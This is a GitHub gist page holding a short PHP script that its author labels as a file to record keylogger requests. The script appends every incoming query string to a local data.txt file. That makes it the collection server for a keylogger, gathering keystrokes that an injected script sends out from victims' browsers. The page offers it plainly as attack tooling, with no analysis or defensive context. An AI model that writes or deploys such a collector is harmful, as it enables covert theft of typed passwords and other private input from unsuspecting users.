Skip to content

Instantly share code, notes, and snippets.

@rundongliu
Last active July 6, 2016 05:27
Show Gist options
  • Save rundongliu/c685f11599dde5d4abb1e8e4d2651b77 to your computer and use it in GitHub Desktop.
Save rundongliu/c685f11599dde5d4abb1e8e4d2651b77 to your computer and use it in GitHub Desktop.
php file which records keylogger request
<?php
file_put_contents('data.txt', $_SERVER['QUERY_STRING'].PHP_EOL, FILE_APPEND);
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment